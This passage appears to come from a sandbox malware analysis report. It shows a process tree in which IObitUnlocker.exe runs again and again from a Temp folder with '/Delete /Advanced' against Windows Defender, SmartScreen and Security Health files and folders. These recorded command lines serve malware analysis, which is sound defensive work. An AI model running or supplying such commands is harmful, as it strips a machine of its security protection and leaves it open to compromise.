Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8376
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8644
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:676
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8260
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8732
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8656
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8760
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8340
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8444
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8800
